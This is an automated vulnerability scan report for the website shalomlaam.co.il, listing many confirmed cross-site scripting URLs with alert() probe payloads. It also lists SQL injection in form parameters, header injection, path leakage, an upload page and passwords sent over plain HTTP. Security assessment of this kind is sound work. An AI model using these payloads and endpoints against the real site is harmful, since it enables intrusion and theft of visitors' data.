www.shalomlaam.co.il 801

Upload: benjamin-gill

Post on 15-Oct-2015


  • NETSPARKER SCAN REPORT SUMMARY

    TARGET URL: http://www.shalomlaam.co.il/
    SCAN DATE: 20 15:41:03 2014
    REPORT DATE: 20 16:55:44 2014
    SCAN DURATION: 01:12:58
    Total Requests: 59131
    Average Speed: 13.51 req/sec.

    268 identified
    158 confirmed
    10 critical
    95 informational

    SCAN SETTINGS
    ENABLED ENGINES: Static Tests, Find Backup Files, SQL Injection, Boolean SQL Injection, Blind SQL Injection, Cross-site Scripting, Command Injection, Blind Command Injection, Local File Inclusion, Remote File Inclusion, Remote Code Evaluation, HTTP Header Injection, Open Redirection, Expression Language Injection
    Authentication
    Scheduled

    VULNERABILITIES
    CRITICAL 4%
    IMPORTANT 57%
    MEDIUM 3%
    LOW 1%
    INFORMATION 35%


  • VULNERABILITY SUMMARY

    URL | Parameter | Method | Vulnerability | Confirmed
    / | - | - | [Possible] Internal Path Leakage (*nix) | No
    /'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DB)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /2minute/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /about'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004F1)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /about/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013C)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /about/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /about/reg/ | Query Based | Query String | Cross-site Scripting | Yes
    /about/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004FA)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /about/reg/maillingUpdate.asp | Query Based | Query String | Cross-site Scripting | Yes
    /about/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000522)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /about/search/ | Query Based | Query String | Cross-site Scripting | Yes
    /about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00052F)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /about/search/default.asp | Query Based | Query String | Cross-site Scripting | Yes
    /about/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055A)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /allvideo/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /alon/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000150)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /alon/archive.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /alon/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /alon/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043A)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /alon/list.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /alon/list.asp | - | - | [Possible] Internal Path Leakage (Windows) | No
    /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000156)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /alon/mador.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /alon/mador.asp | - | - | [Possible] Internal Path Leakage (Windows) | No
    /alon/musag.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /alon/musag.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes


  • /ask'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00017C)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /ask/ | rabbi | GET | Cross-site Scripting | Yes
    /ask/ | cat | GET | Cross-site Scripting | Yes
    /ask/ | search | POST | Cross-site Scripting | Yes
    /ask/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /ask/ | - | - | [Possible] Internal Path Leakage (Windows) | No
    /ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000149)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /ask/answer.asp | - | - | Programming Error Message | No
    /ask/answer.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /ask/answer.asp | - | - | [Possible] Internal Path Leakage (Windows) | No
    /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000195)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /ask/ask_rabbi.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000584)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /ask/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /ask/Default.asp | - | - | [Possible] Internal Path Leakage (Windows) | No
    /ask/reg/ | Query Based | Query String | Cross-site Scripting | Yes
    /ask/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00062A)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /ask/reg/maillingUpdate.asp | Query Based | Query String | Cross-site Scripting | Yes
    /ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000642)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /ask/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000646)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /banner/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057B)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /bmidrash/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C7)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /bmidrash/answer.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /bmidrash/bprint.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /bmidrash/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /bmidrash/list.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /bmidrash/mekorot.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015B)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /Branches/snif.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /Branches/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000204)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes


  • /contact/ | name_id | POST | SQL Injection | Yes
    /contact/ | sendFrom | POST | [Probable] SQL Injection | No
    /contact/ | name | POST | [Probable] SQL Injection | No
    /contact/ | phone | POST | [Probable] SQL Injection | No
    /contact/ | subject | POST | [Probable] SQL Injection | No
    /contact/ | f_name | POST | [Probable] SQL Injection | No
    /contact/ | name_id | POST | [Probable] SQL Injection | No
    /contact/ | - | - | MS SQL Version Is Out Of Date | No
    /contact/ | - | - | Microsoft SQL Server Identified | Yes
    /contact/ | - | - | E-mail Address Disclosure | No
    /contact/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000138)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /contact/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /contact/reg/ | Query Based | Query String | Cross-site Scripting | Yes
    /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /contact/reg/maillingUpdate.asp | Query Based | Query String | Cross-site Scripting | Yes
    /contact/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000498)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /contact/search/ | Query Based | Query String | Cross-site Scripting | Yes
    /contact/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004A9)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /contact/search/default.asp | Query Based | Query String | Cross-site Scripting | Yes
    /contact/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004D2)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /crossdomain.xml | - | - | Open Policy Crossdomain.xml Identified | Yes
    /Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000216)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B2)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gallery/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /gallery/ | - | - | [Possible] Internal Path Leakage (Windows) | No
    /gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014F)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gallery/branches.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /gallery/branches.asp | - | - | [Possible] Internal Path Leakage (Windows) | No


  • /gallery/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /gallery/Default.asp | - | - | [Possible] Internal Path Leakage (Windows) | No
    /gallery/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00026D)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gallery/snifim.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /gallery/upload_img.asp | - | - | File Upload Functionality Identified | Yes
    /gallery/upload_img.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /gvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000115)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000134)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gvideo/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gvideo/js/swfaddress.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000445)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gvideo/js/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043D)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gvideo/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00044E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gvideo/style/style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000452)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gvideo/testimonialrotator/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000446)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gvideo/testimonialrotator/testimonialrotator.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000455)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /gvideo/testimonialrotator/testimonialrotator.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000449)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /hagim/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /hagim/3shavuot.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /home/1.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000119)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /images/ | - | - | Internal Server Error | Yes
    /images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000105)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /images/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E9)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /images/pagetop.asp | Query Based | Query String | Cross-site Scripting | Yes
    /images/pagetop.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E6)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /jAccordion/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F2)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000127)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /jAccordion/jquery.easing.1.3.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F5)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /jAccordion/jquery.jAccordion-1.2.1.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F9)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /js/ | - | - | Forbidden Resource | Yes
    /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes


  • /js/+%20win%20+ | Query Based | Query String | Cross-site Scripting | Yes
    /js/+%20win%20+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000409)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /js/AC_RunActiveContent.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DF)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /js/delate_image.asp | Query Based | Query String | Cross-site Scripting | Yes
    /js/delate_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003CE)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /js/func_site.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DC)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /js/getbanner.asp | Query Based | Query String | Cross-site Scripting | Yes
    /js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E5)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /js/HebDate.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E5)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /js/images/ | Query Based | Query String | Cross-site Scripting | Yes
    /js/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040C)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /js/top1.htm | Query Based | Query String | Cross-site Scripting | Yes
    /js/top1.htm'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003C2)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /js/upload_image.asp | Query Based | Query String | Cross-site Scripting | Yes
    /js/upload_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003AF)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /kaftorim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /komiks/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /komiks/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /l/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A7)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /l/agrala_miadim.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /l/agrala_sheelot.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /l/agrala_takanon.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /l/agrala_tozaot.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /l/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /lessons/ | yom | POST | [Probable] SQL Injection | No
    /lessons/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /lessons/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A8)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /lessons/default.asp | yom | POST | [Probable] SQL Injection | No
    /lessons/default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /LIVE/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /LIVE/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019D)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes


  • /live/form_live.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /maillingUpdate.asp | Query Based | Query String | Cross-site Scripting | Yes
    /maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000210)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /news/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /news/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000400)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /news/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /page/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /pages/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /pages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F1)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /pages/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /pages/page.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /pages/page.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021B)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /pagetop.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011F)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013F)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /pitgam/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /pitgam/ | - | - | [Possible] Internal Path Leakage (Windows) | No
    /pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045B)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /pitgam/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /pitgam/Default.asp | - | - | [Possible] Internal Path Leakage (Windows) | No
    /Presentation/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /Presentation/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /reg/ | email | POST | [Probable] SQL Injection | No
    /reg/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B9)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /reg/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No


  • /reg/login.asp | - | - | Password Transmitted Over HTTP | Yes
    /reg/login.asp | - | - | Auto Complete Enabled | Yes
    /reg/login.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /reg/maillingUpdate.asp | - | - | Database Error Message | No
    /reg/maillingUpdate.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D5)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /reg/reg.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FD)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /scripts/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FF)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /search/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D7)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /search/default.asp | q | GET | Cross-site Scripting | Yes
    /search/default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DA)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /sh/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /sh/default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /sipur/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /sipur/ | - | - | [Possible] Internal Path Leakage (Windows) | No
    /sipur/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A0)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /sipur/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /sipur/page.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /sipur/page.asp | - | - | [Possible] Internal Path Leakage (Windows) | No
    /sipur/send_sipur.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /site/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000106)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00012E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/alon/archive.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00029F)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/alon/list.asp | CatID | GET | HTTP Header Injection | No
    /site/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000131)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/ask/ | CatID | GET | HTTP Header Injection | No
    /site/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000298)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes


  • /site/ask/answer.asp | id | GET | HTTP Header Injection | No
    /site/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000302)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/ask/answer_print.asp | - | - | [Possible] Internal Path Leakage (Windows) | No
    /site/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D2)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AD)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/bmidrash/answer.asp | id | GET | HTTP Header Injection | No
    /site/bmidrash/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00037E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/bmidrash/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00033E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/bmidrash/mekorot.asp | id | GET | HTTP Header Injection | No
    /site/bmidrash/mekorot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000386)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A1)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028A)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AE)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/gallery/ | - | - | IIS Version Disclosure | No
    /site/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F7)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E8)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/gallery/highslide/highslide.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000123)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/gallery/highslide/highslide-full.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C4)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A2)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/l/agrala_miadim.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00038E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/l/agrala_sheelot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000397)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/l/agrala_takanon.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000393)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/l/agrala_tozaot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A5)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/pitgam/ | CatID | GET | HTTP Header Injection | No
    /site/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000293)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002DC)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00027E)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/reg/login.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000283)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/reg/reg.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /site/uploadimages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B4)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes


